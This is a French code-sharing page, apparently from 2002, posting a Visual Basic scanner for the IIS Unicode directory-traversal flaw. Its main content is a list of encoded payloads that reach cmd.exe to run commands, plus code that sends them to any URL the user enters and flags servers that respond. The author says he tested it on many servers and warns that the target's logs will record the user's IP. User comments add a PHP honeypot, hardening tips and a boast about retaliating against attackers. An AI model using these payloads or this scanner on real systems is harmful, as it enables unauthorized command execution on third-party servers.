Scanneur de failles unicodes

Soyez le premier à donner votre avis sur cette source.

Vue 4 858 fois - Téléchargée 395 fois

Description

La failles unicodes est une failles qui est présente sur les serveurs IIS (internet informations Service). Les systèmes vulnérables sont Microsoft IIS 5.0 sur Windows NT 2000 et IIS 4.0 sur Windows NT 4.0. c'était un petit résumé rapides de la failles...
Je l'ai testé et bon nombre de serveur possède une failles de ce type
ATTENTION: si vous testé ces failles sur un serveur prenez notes que les logs du serveur contiendront votre IP et toutes les failles testé...
NOTE: cette source n'est pas de moi...
mais j'ai trouvé utile de la mettre.

Source / Exemple :


Dim test_termine As String
Dim prochaine As Integer

'Le code va commencé par vérifier si le  textbox n'est pas vide,
'si c'est le cas rien ne se passe ; ensuite, le code vérifiera si
'le dernier caractère est une barre /, et si c'est le cas, alors il l'enlève
'en remplaçant le contenu du textbox par l'adresse sans la barre /
'La vérification étant terminé le bouton est désactivé et le code
'appelle la fonction search qui va lancer les tests.
Private Sub Command1_Click()
    If url.Text <> "" Then
        If Right(url.Text, 1) = "/" Then
            url.Text = Mid(url.Text, 1, Len(url.Text) - 1)
        End If
        Command1.Enabled = False
        Call search(1)
    End If
End Sub

Private Sub form_load()
'failles UNICODES qui se trouveras dans le listbox
'Vous pouvez utiliser ce soft pour tester d'autres failles
    With failles
        .AddItem "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:"
        .AddItem "/iisadmpwd/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:"
        .AddItem "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:"
        .AddItem "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\"
        .AddItem "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\"
        .AddItem "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir%20c:\"
        .AddItem "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\"
        .AddItem "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir%20c:\"
        .AddItem "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir%20c:\"
        .AddItem "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir%20c:\"
        .AddItem "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir%20c:\"
        .AddItem "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\"
        .AddItem "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:"
        .AddItem "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir"
        .AddItem "/msadc/..%%35%63../..%%35%63../..%%35%63/winnt/system32/cmd.exe?c+dir"
        .AddItem "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir"
        .AddItem "/msadc/..%255C..%255c..%255cwinnt/system35/cmd.exe?/c+dir"
        .AddItem "/msadc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?c+dir"
        .AddItem "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..winnt/system32/cmd.exe?/c+dir"
    End With
End Sub

'cette boucle aura pour première valeur le contenu de la variable
'val et comme dernière ligne de la liste failles.
Function search(val As Integer)
    For i = val To failles.ListCount - 1
        prochaine = i + 1
        source.Text = Inet.OpenURL(url.Text & failles.List(i))
        Timer1.Enabled = True
        GoTo fin
    Next i
    Command1.Enabled = True
fin:
End Function

'Première chose: la fonction vérifie si la source n'est pas vide
'dans ce cas rien n'est chargée?si elle n'est pas vide, on lance la boucle
'La boucle va en fait, tester les caractères 6 par 6 pour voir si dans la source
'il n'y a pas de balise.
Private Sub source_change()
    If source.Text <> "" Then
        For i = 1 To Len(source.Text) - 6
            If Mid(source.Text, i, 6) = "<html>" Or Mid(source.Text, i, 6) = "<script>" Or Mid(source.Text, i, 6) = " < head > " Then
            GoTo fin
            End If
        Next i
        resultat.AddItem (url.Text & failles.List(prochaine - 1))
        text_termine = "oui"
    End If
fin:
    test_termine = "oui"
End Sub

'le timer va donc commencer par vérifier le contenu de la variable
'test_termine. Ensuite, si le contenu est oui, il va modifier le contenu de la variable
'test_termine par non car un nouveau test va commencer. Il va se désactiver lui même
'carc'est la fonction search qui active le timer, Il va également
'vider le contenu de la source, et pour finr, il appellera la fonction avec comme variable
'val le contenu de prochaine
Private Sub timer1_timer()
    If test_termine = "oui" Then
        test_termine = "non"
        Timer1.Enabled = False
        source.Text = ""
        Call search(prochaine)
    End If
End Sub

Conclusion :


Vous pouvez utilisez cette pour testez d'autres type de failles.

Codes Sources

A voir également

Ajouter un commentaire Commentaires
cs_iubito Messages postés 629 Date d'inscription mercredi 3 juillet 2002 Statut Membre Dernière intervention 9 octobre 2006
14 nov. 2002 à 08:05
et comment on la résoud la faille? ;D
Proger Messages postés 248 Date d'inscription vendredi 10 novembre 2000 Statut Membre Dernière intervention 19 décembre 2008
14 nov. 2002 à 09:02
Raaaa je deteste ces floodeurs qui passent leurs temps à scanner des plages d'adresse à la recherche du port 80 et qui balance ces requete à la con.
N'utilisant pas IIS, les logs du serveur apache ici-bas sont faussé par ces requêtes. Alors voila une contremesure :

- créer un dossier /scripts/ dans le root http
- créer un fichier root.exe dans ce dossier, et associer l'extension .exe a l'application php (ou asp, peu importe)
- dans root.exe, mettre du html et du php comme suit :
<html><head></head>
<?
echo "You have been caught trying hacking this server.";

echo "WARNING !

This server is a private read-only http server. Any malicious
connection (like this one) is prohibited and will result in criminal prosecution
under applicable criminal laws if there is other attempt.
Ce serveur est uniquement prévu pour la lecture seul. Toute tentative d'acces
malveillant ou tentative d'attaque est interdite et passible d'un an de
prison et de 15 244 Euros d'amende (nouveau code penal - article 323-1).
Si d'autres connexions malveillantes sont enregistré, le sysop recherchera plus
d'information sur vous et votre machine et contactera votre fournisseur d'accès.
";
echo "Informations about remote host :
IP : $REMOTE_ADDR
DNS : $REMOTE_HOST
";
$t=fopen("hacklog.txt","a");
fputs($t, "$REMOTE_ADDR - $REMOTE_HOST
");
fclose($t);
echo "Logging completed.";
?></html>

(concrètement ce code enregistre l'ip et le nom dns de l'hôte dans le fichier hacklog.txt . dans la vrai version de ce code, il y a exécution automatique d'une msgbox sur l'ecran du serveur dès que cette page est ouvert, et en quelques secondes je traçe le lamerz et si je suis de mauvais poil je [bip...] définitivement son os)

Voila avec ça vous avez l'esprit tranquille

Une petite statistique ? sur un serveur http anodin (c-à-d avec ip non fixe) je me prend 1 tentative de hack via cette "méthode faille unicode" par heure! et comme par hasard c'est des adsl-ien de wanadoo qui remporte la palme du plus grand nombre de hack...
erreurs404 Messages postés 117 Date d'inscription lundi 23 octobre 2000 Statut Membre Dernière intervention 12 août 2009
14 nov. 2002 à 11:24
source désuète et inutile ... 0/10

Proger, j'ai les memes stats que toi ... avec les adsliens de wanamoo, qui d'ailleurs s'en fiche. Wanamoo ne veut pas se priver de la clientèle des lamouzes de 14-25 ans qui réprésentent le gros de sa clientèle.
Mon "serveur", très primitif, étant en vb ce n'était pas bien grave ...
cs_Warny Messages postés 473 Date d'inscription mercredi 7 août 2002 Statut Membre Dernière intervention 10 juin 2015
14 nov. 2002 à 18:04
Ce type d'attaque peut se faire contre un iis confiuré par défaut (genre)
J'ai essayé ce code sur mes propres sites (hébérgés sur IIS3 sous W2K) qui sont configurés perso et ça ne fonctionne pas.
En gros, quand votre iis vient d'être installé, sur le site par défaut enlevez les répertoires virtuels (script, printers...) et faites pointer le répertoire ailleur.
Par la suite, toutes ces attaques vous renverront l'erreur "BAD REQUEST"
cs_Stormy Messages postés 255 Date d'inscription samedi 20 avril 2002 Statut Membre Dernière intervention 16 janvier 2007
14 nov. 2002 à 22:31
Je trouve que cette source n'est pas des moindres. Certes, le correctif Micro$oft est déjà depuis longtemps disponible mais force est de constater que cette faille fait encore le bonheur de nombreux ScriptKiddies. Ce sont les teams de Divx qui en profite le plus d'ailleurs. Au fait, merci HZV... Un petit 7 pour la forme, hop!

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.

Le fait d'être membre vous permet d'avoir des options supplémentaires.